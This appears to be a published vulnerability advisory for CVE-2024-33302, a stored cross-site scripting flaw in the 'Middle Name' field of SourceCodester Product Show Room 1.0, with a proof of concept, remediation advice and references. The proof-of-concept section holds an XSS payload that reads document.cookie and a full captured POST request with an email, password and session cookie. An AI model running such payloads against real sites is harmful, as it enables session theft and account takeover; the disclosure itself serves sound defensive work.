Skip to content

Latest commit

 

History

History
116 lines (84 loc) · 4.82 KB

CVE-2024-33302.md

File metadata and controls

116 lines (84 loc) · 4.82 KB
Raw

Stored Cross-Site Scripting Vulnerability in SourceCodester Product Show Room 1.0 :

Vendor: Sourcecodester
Product: Product Show Room 1.0
Product URL: Product Show Room 1.0

Executive Summary

Stored Cross-Site Scripting (SXSS) vulnerability in Product Show Room 1.0 and earlier allows attacker to inject the Malicious JavaScript Code in the "Middle Name" input field. The malicious code can then be executed whenever the vulnerable web page is accessed by any user, staff or even admin and will remain persistent. It will eventually result in account takeover as the session cookies can be accessed by the malicious JavaScript Code. Issue Details

Vulnerability Name: Stored XSS in Middle Name
Severity: High
Affected URL: /psrs/classes/Users.php?f=save
Affected Parameter: Middle Name
HTTP Method: POST

Issue Description

The web application is vulnerable to Cross-Site Scripting (SXSS) attacks in the "Middle Name" input field. An attacker can exploit this vulnerability by inputting the malicious JavaScript code in the HTTP POST request to create the user. In the provided example, the attacker modifies the "Middle Name" parameter to insert a malicious JavaScript Code that can also access the authentication cookies. Proof Of Concept

Configure a web proxy in your browser.

Navigate to the URL in the browser http://localhost/psrs/classes/Users.php?f=save

Fill in the desired data in the input fields. Intercept the request in the web proxy. Modify the Middle name parameter as shown below and send the request to the server.

-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="middlename"

"><img src=x onerror=alert(document.cookie)>

In the browser just create an account and navigate to homepage

https://drive.google.com/file/d/1CHgwoOWEVzS_upDJSTGQBMdSoVwqKAKQ/view?usp=drive_link Payload:

Content-Disposition: form-data; name="middlename"

"><img src=x onerror=alert(document.cookie)>

Request:

POST /psrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20625722601167454874980765703
Content-Length: 1176
Origin: http://localhost
Connection: close
Referer: http://localhost/psrs/admin/?page=user/manage_user
Cookie: PHPSESSID=ne013b16edsf0e0up00dsppfhb
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="id"


-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="firstname"

"><img src=x onerror=alert(document.cookie)>
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="middlename"

"><img src=x onerror=alert(document.cookie)>
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="lastname"

"><img src=x onerror=alert(document.cookie)>
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="username"

mohit.ahir7086@gmail.com
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="password"

Ramasra1247@
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="type"

1
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

-----------------------------20625722601167454874980765703--

Impact:

Stored XSS attacks can have serious consequences, such as Account takeover by stealing cookies, stealing sensitive data, modifying the content of the web page, or redirecting users to a malicious sites. Remediation:

Implement proper input validation and output encoding to prevent malicious code from being injected into the web application. Use server-side validation to ensure that user input is properly sanitized before being stored in a database or displayed on a web page. Use output encoding to ensure that any user input that is displayed on the web page is properly encoded to prevent malicious code from being executed. References:

https://portswigger.net/web-security/cross-site-scripting/stored

https://owasp.org/www-community/attacks/xss/

Weakness Enumeration:

CWE-79

This report highlights the Stored XSS vulnerability present in the Middle Name parameter of /psrs/classes/Users.php?f=save, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.